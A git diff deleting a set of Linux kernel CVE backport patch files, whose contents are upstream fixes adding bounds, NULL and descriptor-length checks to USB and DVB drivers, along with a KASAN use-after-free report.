-index 9724fe8110e3d..9fef8cc171140 100644
---- a/drivers/media/rc/imon.c
-+++ b/drivers/media/rc/imon.c
-@@ -2515,6 +2515,11 @@ static int imon_probe(struct usb_interface *interface,
- mutex_lock(&driver_lock);
-
- first_if = usb_ifnum_to_if(usbdev, 0);
-+ if (!first_if) {
-+ ret = -ENODEV;
-+ goto fail;
-+ }
-+
- first_if_ctx = usb_get_intfdata(first_if);
-
- if (ifnum == 0) {
diff --git a/Patches/Linux_CVEs/CVE-2017-16538/^4.13/0001.patch b/Patches/Linux_CVEs/CVE-2017-16538/^4.13/0001.patch
deleted file mode 100644
index 1407917e..00000000
--- a/Patches/Linux_CVEs/CVE-2017-16538/^4.13/0001.patch
+++ /dev/null
@@ -1,61 +0,0 @@
-diff --git a/drivers/media/usb/dvb-usb-v2/lmedm04.c b/drivers/media/usb/dvb-usb-v2/lmedm04.c
-index 5e320fa4a795..992f2011a6ba 100644
---- a/drivers/media/usb/dvb-usb-v2/lmedm04.c
-+++ b/drivers/media/usb/dvb-usb-v2/lmedm04.c
-@@ -494,18 +494,23 @@ static int lme2510_pid_filter(struct dvb_usb_adapter *adap, int index, u16 pid,
-
- static int lme2510_return_status(struct dvb_usb_device *d)
- {
-- int ret = 0;
-+ int ret;
- u8 *data;
-
-- data = kzalloc(10, GFP_KERNEL);
-+ data = kzalloc(6, GFP_KERNEL);
- if (!data)
- return -ENOMEM;
-
-- ret |= usb_control_msg(d->udev, usb_rcvctrlpipe(d->udev, 0),
-- 0x06, 0x80, 0x0302, 0x00, data, 0x0006, 200);
-- info("Firmware Status: %x (%x)", ret , data[2]);
-+ ret = usb_control_msg(d->udev, usb_rcvctrlpipe(d->udev, 0),
-+ 0x06, 0x80, 0x0302, 0x00,
-+ data, 0x6, 200);
-+ if (ret != 6)
-+ ret = -EINVAL;
-+ else
-+ ret = data[2];
-+
-+ info("Firmware Status: %6ph", data);
-
-- ret = (ret < 0) ? -ENODEV : data[2];
- kfree(data);
- return ret;
- }
-@@ -1189,6 +1194,7 @@ static int lme2510_get_adapter_count(struct dvb_usb_device *d)
- static int lme2510_identify_state(struct dvb_usb_device *d, const char **name)
- {
- struct lme2510_state *st = d->priv;
-+ int status;
-
- usb_reset_configuration(d->udev);
-
-@@ -1197,12 +1203,16 @@ static int lme2510_identify_state(struct dvb_usb_device *d, const char **name)
-
- st->dvb_usb_lme2510_firmware = dvb_usb_lme2510_firmware;
-
-- if (lme2510_return_status(d) == 0x44) {
-+ status = lme2510_return_status(d);
-+ if (status == 0x44) {
- *name = lme_firmware_switch(d, 0);
- return COLD;
- }
-
-- return 0;
-+ if (status != 0x47)
-+ return -EINVAL;
-+
-+ return WARM;
- }
-
- static int lme2510_get_stream_config(struct dvb_frontend *fe, u8 *ts_type,
diff --git a/Patches/Linux_CVEs/CVE-2017-16538/^4.13/0002.patch b/Patches/Linux_CVEs/CVE-2017-16538/^4.13/0002.patch
deleted file mode 100644
index e5ecf350..00000000
--- a/Patches/Linux_CVEs/CVE-2017-16538/^4.13/0002.patch
+++ /dev/null
@@ -1,37 +0,0 @@
-diff --git a/drivers/media/usb/dvb-usb-v2/lmedm04.c b/drivers/media/usb/dvb-usb-v2/lmedm04.c
-index 992f2011a6ba..be26c029546b 100644
---- a/drivers/media/usb/dvb-usb-v2/lmedm04.c
-+++ b/drivers/media/usb/dvb-usb-v2/lmedm04.c
-@@ -1076,8 +1076,6 @@ static int dm04_lme2510_frontend_attach(struct dvb_usb_adapter *adap)
-
- if (adap->fe[0]) {
- info("FE Found M88RS2000");
-- dvb_attach(ts2020_attach, adap->fe[0], &ts2020_config,
-- &d->i2c_adap);
- st->i2c_tuner_gate_w = 5;
- st->i2c_tuner_gate_r = 5;
- st->i2c_tuner_addr = 0x60;
-@@ -1143,17 +1141,18 @@ static int dm04_lme2510_tuner(struct dvb_usb_adapter *adap)
- ret = st->tuner_config;
- break;
- case TUNER_RS2000:
-- ret = st->tuner_config;
-+ if (dvb_attach(ts2020_attach, adap->fe[0],
-+ &ts2020_config, &d->i2c_adap))
-+ ret = st->tuner_config;
- break;
- default:
- break;
- }
-
-- if (ret)
-+ if (ret) {
- info("TUN Found %s tuner", tun_msg[ret]);
-- else {
-- info("TUN No tuner found --- resetting device");
-- lme_coldreset(d);
-+ } else {
-+ info("TUN No tuner found");
- return -ENODEV;
- }
-
diff --git a/Patches/Linux_CVEs/CVE-2017-16643/3.5+/0001.patch b/Patches/Linux_CVEs/CVE-2017-16643/3.5+/0001.patch
deleted file mode 100644
index 992c8b96..00000000
--- a/Patches/Linux_CVEs/CVE-2017-16643/3.5+/0001.patch
+++ /dev/null
@@ -1,54 +0,0 @@
-From a50829479f58416a013a4ccca791336af3c584c7 Mon Sep 17 00:00:00 2001
-From: Dmitry Torokhov
-Date: Mon, 23 Oct 2017 16:46:00 -0700
-Subject: [PATCH] Input: gtco - fix potential out-of-bound access
-
-parse_hid_report_descriptor() has a while (i < length) loop, which
-only guarantees that there's at least 1 byte in the buffer, but the
-loop body can read multiple bytes which causes out-of-bounds access.
-
-Reported-by: Andrey Konovalov
-Reviewed-by: Andrey Konovalov
-Cc: stable@vger.kernel.org
-Signed-off-by: Dmitry Torokhov
----
- drivers/input/tablet/gtco.c | 17 ++++++++++-------
- 1 file changed, 10 insertions(+), 7 deletions(-)
-
-diff --git a/drivers/input/tablet/gtco.c b/drivers/input/tablet/gtco.c
-index b796e891e2eed..4b8b9d7aa75e2 100644
---- a/drivers/input/tablet/gtco.c
-+++ b/drivers/input/tablet/gtco.c
-@@ -230,13 +230,17 @@ static void parse_hid_report_descriptor(struct gtco *device, char * report,
-
- /* Walk this report and pull out the info we need */
- while (i < length) {
-- prefix = report[i];
--
-- /* Skip over prefix */
-- i++;
-+ prefix = report[i++];
-
- /* Determine data size and save the data in the proper variable */
-- size = PREF_SIZE(prefix);
-+ size = (1U << PREF_SIZE(prefix)) >> 1;
-+ if (i + size > length) {
-+ dev_err(ddev,
-+ "Not enough data (need %d, have %d)\n",
-+ i + size, length);
-+ break;
-+ }
-+
- switch (size) {
- case 1:
- data = report[i];
-@@ -244,8 +248,7 @@ static void parse_hid_report_descriptor(struct gtco *device, char * report,
- case 2:
- data16 = get_unaligned_le16(&report[i]);
- break;
-- case 3:
-- size = 4;
-+ case 4:
- data32 = get_unaligned_le32(&report[i]);
- break;
- }
diff --git a/Patches/Linux_CVEs/CVE-2017-16645/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-16645/ANY/0001.patch
deleted file mode 100644
index 273c3310..00000000
--- a/Patches/Linux_CVEs/CVE-2017-16645/ANY/0001.patch
+++ /dev/null
@@ -1,47 +0,0 @@
-From ea04efee7635c9120d015dcdeeeb6988130cb67a Mon Sep 17 00:00:00 2001
-From: Dmitry Torokhov
-Date: Sat, 7 Oct 2017 11:07:47 -0700
-Subject: [PATCH] Input: ims-psu - check if CDC union descriptor is sane
-
-Before trying to use CDC union descriptor, try to validate whether that it
-is sane by checking that intf->altsetting->extra is big enough and that
-descriptor bLength is not too big and not too small.
-
-Reported-by: Andrey Konovalov
-Signed-off-by: Dmitry Torokhov
----
- drivers/input/misc/ims-pcu.c | 16 ++++++++++++++--
- 1 file changed, 14 insertions(+), 2 deletions(-)
-
-diff --git a/drivers/input/misc/ims-pcu.c b/drivers/input/misc/ims-pcu.c
-index 6bf82ea8c918a..ae473123583bb 100644
---- a/drivers/input/misc/ims-pcu.c
-+++ b/drivers/input/misc/ims-pcu.c
-@@ -1635,13 +1635,25 @@ ims_pcu_get_cdc_union_desc(struct usb_interface *intf)
- return NULL;
- }
-
-- while (buflen > 0) {
-+ while (buflen >= sizeof(*union_desc)) {
- union_desc = (struct usb_cdc_union_desc *)buf;
-
-+ if (union_desc->bLength > buflen) {
-+ dev_err(&intf->dev, "Too large descriptor\n");
-+ return NULL;
-+ }
-+
- if (union_desc->bDescriptorType == USB_DT_CS_INTERFACE &&
- union_desc->bDescriptorSubType == USB_CDC_UNION_TYPE) {
- dev_dbg(&intf->dev, "Found union header\n");
-- return union_desc;
-+
-+ if (union_desc->bLength >= sizeof(*union_desc))
-+ return union_desc;
-+
-+ dev_err(&intf->dev,
-+ "Union descriptor to short (%d vs %zd\n)",
-+ union_desc->bLength, sizeof(*union_desc));
-+ return NULL;
- }
-
- buflen -= union_desc->bLength;
diff --git a/Patches/Linux_CVEs/CVE-2017-16646/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-16646/ANY/0001.patch
deleted file mode 100644
index 335e94e7..00000000
--- a/Patches/Linux_CVEs/CVE-2017-16646/ANY/0001.patch
+++ /dev/null
@@ -1,112 +0,0 @@
-diff --git a/drivers/media/usb/dvb-usb/dib0700_devices.c b/drivers/media/usb/dvb-usb/dib0700_devices.c
-index 6020170fe99a..92098c1b78e5 100644
---- a/drivers/media/usb/dvb-usb/dib0700_devices.c
-+++ b/drivers/media/usb/dvb-usb/dib0700_devices.c
-@@ -291,7 +291,7 @@ static int stk7700P2_frontend_attach(struct dvb_usb_adapter *adap)
- stk7700d_dib7000p_mt2266_config)
- != 0) {
- err("%s: state->dib7000p_ops.i2c_enumeration failed. Cannot continue\n", __func__);
-- dvb_detach(&state->dib7000p_ops);
-+ dvb_detach(state->dib7000p_ops.set_wbd_ref);
- return -ENODEV;
- }
- }
-@@ -325,7 +325,7 @@ static int stk7700d_frontend_attach(struct dvb_usb_adapter *adap)
- stk7700d_dib7000p_mt2266_config)
- != 0) {
- err("%s: state->dib7000p_ops.i2c_enumeration failed. Cannot continue\n", __func__);
-- dvb_detach(&state->dib7000p_ops);
-+ dvb_detach(state->dib7000p_ops.set_wbd_ref);
- return -ENODEV;
- }
- }
-@@ -478,7 +478,7 @@ static int stk7700ph_frontend_attach(struct dvb_usb_adapter *adap)
- &stk7700ph_dib7700_xc3028_config) != 0) {
- err("%s: state->dib7000p_ops.i2c_enumeration failed. Cannot continue\n",
- __func__);
-- dvb_detach(&state->dib7000p_ops);
-+ dvb_detach(state->dib7000p_ops.set_wbd_ref);
- return -ENODEV;
- }
-
-@@ -1010,7 +1010,7 @@ static int stk7070p_frontend_attach(struct dvb_usb_adapter *adap)
- &dib7070p_dib7000p_config) != 0) {
- err("%s: state->dib7000p_ops.i2c_enumeration failed. Cannot continue\n",
- __func__);
-- dvb_detach(&state->dib7000p_ops);
-+ dvb_detach(state->dib7000p_ops.set_wbd_ref);
- return -ENODEV;
- }
-
-@@ -1068,7 +1068,7 @@ static int stk7770p_frontend_attach(struct dvb_usb_adapter *adap)
- &dib7770p_dib7000p_config) != 0) {
- err("%s: state->dib7000p_ops.i2c_enumeration failed. Cannot continue\n",
- __func__);
-- dvb_detach(&state->dib7000p_ops);
-+ dvb_detach(state->dib7000p_ops.set_wbd_ref);
- return -ENODEV;
- }
-
-@@ -3056,7 +3056,7 @@ static int nim7090_frontend_attach(struct dvb_usb_adapter *adap)
-
- if (state->dib7000p_ops.i2c_enumeration(&adap->dev->i2c_adap, 1, 0x10, &nim7090_dib7000p_config) != 0) {
- err("%s: state->dib7000p_ops.i2c_enumeration failed. Cannot continue\n", __func__);
-- dvb_detach(&state->dib7000p_ops);
-+ dvb_detach(state->dib7000p_ops.set_wbd_ref);
- return -ENODEV;
- }
- adap->fe_adap[0].fe = state->dib7000p_ops.init(&adap->dev->i2c_adap, 0x80, &nim7090_dib7000p_config);
-@@ -3109,7 +3109,7 @@ static int tfe7090pvr_frontend0_attach(struct dvb_usb_adapter *adap)
- /* initialize IC 0 */
- if (state->dib7000p_ops.i2c_enumeration(&adap->dev->i2c_adap, 1, 0x20, &tfe7090pvr_dib7000p_config[0]) != 0) {
- err("%s: state->dib7000p_ops.i2c_enumeration failed. Cannot continue\n", __func__);
-- dvb_detach(&state->dib7000p_ops);
-+ dvb_detach(state->dib7000p_ops.set_wbd_ref);
- return -ENODEV;
- }
-
-@@ -3139,7 +3139,7 @@ static int tfe7090pvr_frontend1_attach(struct dvb_usb_adapter *adap)
- i2c = state->dib7000p_ops.get_i2c_master(adap->dev->adapter[0].fe_adap[0].fe, DIBX000_I2C_INTERFACE_GPIO_6_7, 1);
- if (state->dib7000p_ops.i2c_enumeration(i2c, 1, 0x10, &tfe7090pvr_dib7000p_config[1]) != 0) {
- err("%s: state->dib7000p_ops.i2c_enumeration failed. Cannot continue\n", __func__);
-- dvb_detach(&state->dib7000p_ops);
-+ dvb_detach(state->dib7000p_ops.set_wbd_ref);
- return -ENODEV;
- }
-
-@@ -3214,7 +3214,7 @@ static int tfe7790p_frontend_attach(struct dvb_usb_adapter *adap)
- 1, 0x10, &tfe7790p_dib7000p_config) != 0) {
- err("%s: state->dib7000p_ops.i2c_enumeration failed. Cannot continue\n",
- __func__);
-- dvb_detach(&state->dib7000p_ops);
-+ dvb_detach(state->dib7000p_ops.set_wbd_ref);
- return -ENODEV;
- }
- adap->fe_adap[0].fe = state->dib7000p_ops.init(&adap->dev->i2c_adap,
-@@ -3309,7 +3309,7 @@ static int stk7070pd_frontend_attach0(struct dvb_usb_adapter *adap)
- stk7070pd_dib7000p_config) != 0) {
- err("%s: state->dib7000p_ops.i2c_enumeration failed. Cannot continue\n",
- __func__);
-- dvb_detach(&state->dib7000p_ops);
-+ dvb_detach(state->dib7000p_ops.set_wbd_ref);
- return -ENODEV;
- }
-
-@@ -3384,7 +3384,7 @@ static int novatd_frontend_attach(struct dvb_usb_adapter *adap)
- stk7070pd_dib7000p_config) != 0) {
- err("%s: state->dib7000p_ops.i2c_enumeration failed. Cannot continue\n",
- __func__);
-- dvb_detach(&state->dib7000p_ops);
-+ dvb_detach(state->dib7000p_ops.set_wbd_ref);
- return -ENODEV;
- }
- }
-@@ -3620,7 +3620,7 @@ static int pctv340e_frontend_attach(struct dvb_usb_adapter *adap)
-
- if (state->dib7000p_ops.dib7000pc_detection(&adap->dev->i2c_adap) == 0) {
- /* Demodulator not found for some reason? */
-- dvb_detach(&state->dib7000p_ops);
-+ dvb_detach(state->dib7000p_ops.set_wbd_ref);
- return -ENODEV;
- }
-
diff --git a/Patches/Linux_CVEs/CVE-2017-16647/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-16647/ANY/0001.patch
deleted file mode 100644
index b7dd63f4..00000000
--- a/Patches/Linux_CVEs/CVE-2017-16647/ANY/0001.patch
+++ /dev/null
@@ -1,22 +0,0 @@
-diff --git a/drivers/net/usb/asix_devices.c b/drivers/net/usb/asix_devices.c
-index b2ff88e69a81..3d4f7959dabb 100644
---- a/drivers/net/usb/asix_devices.c
-+++ b/drivers/net/usb/asix_devices.c
-@@ -626,7 +626,7 @@ static int asix_suspend(struct usb_interface *intf, pm_message_t message)
- struct usbnet *dev = usb_get_intfdata(intf);
- struct asix_common_private *priv = dev->driver_priv;
-
-- if (priv->suspend)
-+ if (priv && priv->suspend)
- priv->suspend(dev);
-
- return usbnet_suspend(intf, message);
-@@ -678,7 +678,7 @@ static int asix_resume(struct usb_interface *intf)
- struct usbnet *dev = usb_get_intfdata(intf);
- struct asix_common_private *priv = dev->driver_priv;
-
-- if (priv->resume)
-+ if (priv && priv->resume)
- priv->resume(dev);
-
- return usbnet_resume(intf);
diff --git a/Patches/Linux_CVEs/CVE-2017-16648/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-16648/ANY/0001.patch
deleted file mode 100644
index c9bc20d8..00000000
--- a/Patches/Linux_CVEs/CVE-2017-16648/ANY/0001.patch
+++ /dev/null
@@ -1,182 +0,0 @@ -From b1cb7372fa822af6c06c8045963571d13ad6348b Mon Sep 17 00:00:00 2001 -From: Mauro Carvalho Chehab -Date: Tue, 7 Nov 2017 08:39:39 -0500 -Subject: [PATCH] dvb_frontend: don't use-after-free the frontend struct - -dvb_frontend_invoke_release() may free the frontend struct. -So, the free logic can't update it anymore after calling it. - -That's OK, as __dvb_frontend_free() is called only when the -krefs are zeroed, so nobody is using it anymore. - -That should fix the following KASAN error: - -The KASAN report looks like this (running on kernel 3e0cc09a3a2c40ec1ffb6b4e12da86e98feccb11 (4.14-rc5+)): -================================================================== -BUG: KASAN: use-after-free in __dvb_frontend_free+0x113/0x120 -Write of size 8 at addr ffff880067d45a00 by task kworker/0:1/24 - -CPU: 0 PID: 24 Comm: kworker/0:1 Not tainted 4.14.0-rc5-43687-g06ab8a23e0e6 #545 -Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Bochs 01/01/2011 -Workqueue: usb_hub_wq hub_event -Call Trace: - __dump_stack lib/dump_stack.c:16 - dump_stack+0x292/0x395 lib/dump_stack.c:52 - print_address_description+0x78/0x280 mm/kasan/report.c:252 - kasan_report_error mm/kasan/report.c:351 - kasan_report+0x23d/0x350 mm/kasan/report.c:409 - __asan_report_store8_noabort+0x1c/0x20 mm/kasan/report.c:435 - __dvb_frontend_free+0x113/0x120 drivers/media/dvb-core/dvb_frontend.c:156 - dvb_frontend_put+0x59/0x70 drivers/media/dvb-core/dvb_frontend.c:176 - dvb_frontend_detach+0x120/0x150 drivers/media/dvb-core/dvb_frontend.c:2803 - dvb_usb_adapter_frontend_exit+0xd6/0x160 drivers/media/usb/dvb-usb/dvb-usb-dvb.c:340 - dvb_usb_adapter_exit drivers/media/usb/dvb-usb/dvb-usb-init.c:116 - dvb_usb_exit+0x9b/0x200 drivers/media/usb/dvb-usb/dvb-usb-init.c:132 - dvb_usb_device_exit+0xa5/0xf0 drivers/media/usb/dvb-usb/dvb-usb-init.c:295 - usb_unbind_interface+0x21c/0xa90 drivers/usb/core/driver.c:423 - __device_release_driver drivers/base/dd.c:861 - 
device_release_driver_internal+0x4f1/0x5c0 drivers/base/dd.c:893 - device_release_driver+0x1e/0x30 drivers/base/dd.c:918 - bus_remove_device+0x2f4/0x4b0 drivers/base/bus.c:565 - device_del+0x5c4/0xab0 drivers/base/core.c:1985 - usb_disable_device+0x1e9/0x680 drivers/usb/core/message.c:1170 - usb_disconnect+0x260/0x7a0 drivers/usb/core/hub.c:2124 - hub_port_connect drivers/usb/core/hub.c:4754 - hub_port_connect_change drivers/usb/core/hub.c:5009 - port_event drivers/usb/core/hub.c:5115 - hub_event+0x1318/0x3740 drivers/usb/core/hub.c:5195 - process_one_work+0xc73/0x1d90 kernel/workqueue.c:2119 - worker_thread+0x221/0x1850 kernel/workqueue.c:2253 - kthread+0x363/0x440 kernel/kthread.c:231 - ret_from_fork+0x2a/0x40 arch/x86/entry/entry_64.S:431 - -Allocated by task 24: - save_stack_trace+0x1b/0x20 arch/x86/kernel/stacktrace.c:59 - save_stack+0x43/0xd0 mm/kasan/kasan.c:447 - set_track mm/kasan/kasan.c:459 - kasan_kmalloc+0xad/0xe0 mm/kasan/kasan.c:551 - kmem_cache_alloc_trace+0x11e/0x2d0 mm/slub.c:2772 - kmalloc ./include/linux/slab.h:493 - kzalloc ./include/linux/slab.h:666 - dtt200u_fe_attach+0x4c/0x110 drivers/media/usb/dvb-usb/dtt200u-fe.c:212 - dtt200u_frontend_attach+0x35/0x80 drivers/media/usb/dvb-usb/dtt200u.c:136 - dvb_usb_adapter_frontend_init+0x32b/0x660 drivers/media/usb/dvb-usb/dvb-usb-dvb.c:286 - dvb_usb_adapter_init drivers/media/usb/dvb-usb/dvb-usb-init.c:86 - dvb_usb_init drivers/media/usb/dvb-usb/dvb-usb-init.c:162 - dvb_usb_device_init+0xf73/0x17f0 drivers/media/usb/dvb-usb/dvb-usb-init.c:277 - dtt200u_usb_probe+0xa1/0xe0 drivers/media/usb/dvb-usb/dtt200u.c:155 - usb_probe_interface+0x35d/0x8e0 drivers/usb/core/driver.c:361 - really_probe drivers/base/dd.c:413 - driver_probe_device+0x610/0xa00 drivers/base/dd.c:557 - __device_attach_driver+0x230/0x290 drivers/base/dd.c:653 - bus_for_each_drv+0x161/0x210 drivers/base/bus.c:463 - __device_attach+0x26b/0x3c0 drivers/base/dd.c:710 - device_initial_probe+0x1f/0x30 drivers/base/dd.c:757 - 
bus_probe_device+0x1eb/0x290 drivers/base/bus.c:523 - device_add+0xd0b/0x1660 drivers/base/core.c:1835 - usb_set_configuration+0x104e/0x1870 drivers/usb/core/message.c:1932 - generic_probe+0x73/0xe0 drivers/usb/core/generic.c:174 - usb_probe_device+0xaf/0xe0 drivers/usb/core/driver.c:266 - really_probe drivers/base/dd.c:413 - driver_probe_device+0x610/0xa00 drivers/base/dd.c:557 - __device_attach_driver+0x230/0x290 drivers/base/dd.c:653 - bus_for_each_drv+0x161/0x210 drivers/base/bus.c:463 - __device_attach+0x26b/0x3c0 drivers/base/dd.c:710 - device_initial_probe+0x1f/0x30 drivers/base/dd.c:757 - bus_probe_device+0x1eb/0x290 drivers/base/bus.c:523 - device_add+0xd0b/0x1660 drivers/base/core.c:1835 - usb_new_device+0x7b8/0x1020 drivers/usb/core/hub.c:2457 - hub_port_connect drivers/usb/core/hub.c:4903 - hub_port_connect_change drivers/usb/core/hub.c:5009 - port_event drivers/usb/core/hub.c:5115 - hub_event+0x194d/0x3740 drivers/usb/core/hub.c:5195 - process_one_work+0xc73/0x1d90 kernel/workqueue.c:2119 - worker_thread+0x221/0x1850 kernel/workqueue.c:2253 - kthread+0x363/0x440 kernel/kthread.c:231 - ret_from_fork+0x2a/0x40 arch/x86/entry/entry_64.S:431 - -Freed by task 24: - save_stack_trace+0x1b/0x20 arch/x86/kernel/stacktrace.c:59 - save_stack+0x43/0xd0 mm/kasan/kasan.c:447 - set_track mm/kasan/kasan.c:459 - kasan_slab_free+0x72/0xc0 mm/kasan/kasan.c:524 - slab_free_hook mm/slub.c:1390 - slab_free_freelist_hook mm/slub.c:1412 - slab_free mm/slub.c:2988 - kfree+0xf6/0x2f0 mm/slub.c:3919 - dtt200u_fe_release+0x3c/0x50 drivers/media/usb/dvb-usb/dtt200u-fe.c:202 - dvb_frontend_invoke_release.part.13+0x1c/0x30 drivers/media/dvb-core/dvb_frontend.c:2790 - dvb_frontend_invoke_release drivers/media/dvb-core/dvb_frontend.c:2789 - __dvb_frontend_free+0xad/0x120 drivers/media/dvb-core/dvb_frontend.c:153 - dvb_frontend_put+0x59/0x70 drivers/media/dvb-core/dvb_frontend.c:176 - dvb_frontend_detach+0x120/0x150 drivers/media/dvb-core/dvb_frontend.c:2803 - 
dvb_usb_adapter_frontend_exit+0xd6/0x160 drivers/media/usb/dvb-usb/dvb-usb-dvb.c:340 - dvb_usb_adapter_exit drivers/media/usb/dvb-usb/dvb-usb-init.c:116 - dvb_usb_exit+0x9b/0x200 drivers/media/usb/dvb-usb/dvb-usb-init.c:132 - dvb_usb_device_exit+0xa5/0xf0 drivers/media/usb/dvb-usb/dvb-usb-init.c:295 - usb_unbind_interface+0x21c/0xa90 drivers/usb/core/driver.c:423 - __device_release_driver drivers/base/dd.c:861 - device_release_driver_internal+0x4f1/0x5c0 drivers/base/dd.c:893 - device_release_driver+0x1e/0x30 drivers/base/dd.c:918 - bus_remove_device+0x2f4/0x4b0 drivers/base/bus.c:565 - device_del+0x5c4/0xab0 drivers/base/core.c:1985 - usb_disable_device+0x1e9/0x680 drivers/usb/core/message.c:1170 - usb_disconnect+0x260/0x7a0 drivers/usb/core/hub.c:2124 - hub_port_connect drivers/usb/core/hub.c:4754 - hub_port_connect_change drivers/usb/core/hub.c:5009 - port_event drivers/usb/core/hub.c:5115 - hub_event+0x1318/0x3740 drivers/usb/core/hub.c:5195 - process_one_work+0xc73/0x1d90 kernel/workqueue.c:2119 - worker_thread+0x221/0x1850 kernel/workqueue.c:2253 - kthread+0x363/0x440 kernel/kthread.c:231 - ret_from_fork+0x2a/0x40 arch/x86/entry/entry_64.S:431 - -The buggy address belongs to the object at ffff880067d45500 - which belongs to the cache kmalloc-2048 of size 2048 -The buggy address is located 1280 bytes inside of - 2048-byte region [ffff880067d45500, ffff880067d45d00) -The buggy address belongs to the page: -page:ffffea00019f5000 count:1 mapcount:0 mapping: (null) -index:0x0 compound_mapcount: 0 -flags: 0x100000000008100(slab|head) -raw: 0100000000008100 0000000000000000 0000000000000000 00000001000f000f -raw: dead000000000100 dead000000000200 ffff88006c002d80 0000000000000000 -page dumped because: kasan: bad access detected - -Memory state around the buggy address: - ffff880067d45900: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb - ffff880067d45980: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb - ffff880067d45a00: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb 
fb - ^ - ffff880067d45a80: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb - ffff880067d45b00: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb -================================================================== - -Fixes: ead666000a5f ("media: dvb_frontend: only use kref after initialized") - -Reported-by: Andrey Konovalov -Suggested-by: Matthias Schwarzott -Tested-by: Andrey Konovalov -Signed-off-by: Mauro Carvalho Chehab ---- - drivers/media/dvb-core/dvb_frontend.c | 7 ++----- - 1 file changed, 2 insertions(+), 5 deletions(-) - -diff --git a/drivers/media/dvb-core/dvb_frontend.c b/drivers/media/dvb-core/dvb_frontend.c -index d485d5f6cc887..3ad83359098bd 100644 ---- a/drivers/media/dvb-core/dvb_frontend.c -+++ b/drivers/media/dvb-core/dvb_frontend.c -@@ -150,11 +150,8 @@ static void __dvb_frontend_free(struct dvb_frontend *fe) - - dvb_frontend_invoke_release(fe, fe->ops.release); - -- if (!fepriv) -- return; -- -- kfree(fepriv); -- fe->frontend_priv = NULL; -+ if (fepriv) -+ kfree(fepriv); - } - - static void dvb_frontend_free(struct kref *ref) diff --git a/Patches/Linux_CVEs/CVE-2017-16649/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-16649/ANY/0001.patch deleted file mode 100644 index 9e18d383..00000000 --- a/Patches/Linux_CVEs/CVE-2017-16649/ANY/0001.patch +++ /dev/null @@ -1,13 +0,0 @@ -diff --git a/drivers/net/usb/cdc_ether.c b/drivers/net/usb/cdc_ether.c -index 3e7a3ac3a362..05dca3e5c93d 100644 ---- a/drivers/net/usb/cdc_ether.c -+++ b/drivers/net/usb/cdc_ether.c -@@ -230,7 +230,7 @@ int usbnet_generic_cdc_bind(struct usbnet *dev, struct usb_interface *intf) - goto bad_desc; - } - -- if (header.usb_cdc_ether_desc) { -+ if (header.usb_cdc_ether_desc && info->ether->wMaxSegmentSize) { - dev->hard_mtu = le16_to_cpu(info->ether->wMaxSegmentSize); - /* because of Zaurus, we may be ignoring the host - * side link address we were given. 
diff --git a/Patches/Linux_CVEs/CVE-2017-16650/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-16650/ANY/0001.patch
deleted file mode 100644
index 01ec5a56..00000000
--- a/Patches/Linux_CVEs/CVE-2017-16650/ANY/0001.patch
+++ /dev/null
@@ -1,13 +0,0 @@
-diff --git a/drivers/net/usb/qmi_wwan.c b/drivers/net/usb/qmi_wwan.c
-index 8c3733608271..a4f229edcceb 100644
---- a/drivers/net/usb/qmi_wwan.c
-+++ b/drivers/net/usb/qmi_wwan.c
-@@ -681,7 +681,7 @@ static int qmi_wwan_bind(struct usbnet *dev, struct usb_interface *intf)
- }
-
- /* errors aren't fatal - we can live with the dynamic address */
-- if (cdc_ether) {
-+ if (cdc_ether && cdc_ether->wMaxSegmentSize) {
- dev->hard_mtu = le16_to_cpu(cdc_ether->wMaxSegmentSize);
- usbnet_get_ethernet_addr(dev, cdc_ether->iMACAddress);
- }
diff --git a/Patches/Linux_CVEs/CVE-2017-16USB/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-16USB/ANY/0001.patch
deleted file mode 100644
index dfcbd42f..00000000
--- a/Patches/Linux_CVEs/CVE-2017-16USB/ANY/0001.patch
+++ /dev/null
@@ -1,56 +0,0 @@
-From 7682e399485fe19622b6fd82510b1f4551e48a25 Mon Sep 17 00:00:00 2001
-From: Takashi Iwai
-Date: Mon, 2 Oct 2017 14:06:43 +0200
-Subject: [PATCH] ALSA: usx2y: Suppress kernel warning at page allocation
- failures
-
-The usx2y driver allocates the stream read/write buffers in continuous
-pages depending on the stream setup, and this may spew the kernel
-warning messages with a stack trace like:
- WARNING: CPU: 1 PID: 1846 at mm/page_alloc.c:3883
- __alloc_pages_slowpath+0x1ef2/0x2d70
- Modules linked in:
- CPU: 1 PID: 1846 Comm: kworker/1:2 Not tainted
- ....
-
-It may confuse user as if it were any serious error, although this is
-no fatal error and the driver handles the error case gracefully.
-Since the driver has already some sanity check of the given size (128
-and 256 pages), it can't pass any crazy value. So it's merely page
-fragmentation.
-
-This patch adds __GFP_NOWARN to each caller for suppressing such
-kernel warnings. The original issue was spotted by syzkaller.
-
-Reported-by: Andrey Konovalov
-Tested-by: Andrey Konovalov
-Cc:
-Signed-off-by: Takashi Iwai
----
- sound/usb/usx2y/usb_stream.c | 6 ++++--
- 1 file changed, 4 insertions(+), 2 deletions(-)
-
-diff --git a/sound/usb/usx2y/usb_stream.c b/sound/usb/usx2y/usb_stream.c
-index 4dab490807009..e229abd216526 100644
---- a/sound/usb/usx2y/usb_stream.c
-+++ b/sound/usb/usx2y/usb_stream.c
-@@ -191,7 +191,8 @@ struct usb_stream *usb_stream_new(struct usb_stream_kernel *sk,
- }
-
- pg = get_order(read_size);
-- sk->s = (void *) __get_free_pages(GFP_KERNEL|__GFP_COMP|__GFP_ZERO, pg);
-+ sk->s = (void *) __get_free_pages(GFP_KERNEL|__GFP_COMP|__GFP_ZERO|
-+ __GFP_NOWARN, pg);
- if (!sk->s) {
- snd_printk(KERN_WARNING "couldn't __get_free_pages()\n");
- goto out;
-@@ -211,7 +212,8 @@ struct usb_stream *usb_stream_new(struct usb_stream_kernel *sk,
- pg = get_order(write_size);
-
- sk->write_page =
-- (void *)__get_free_pages(GFP_KERNEL|__GFP_COMP|__GFP_ZERO, pg);
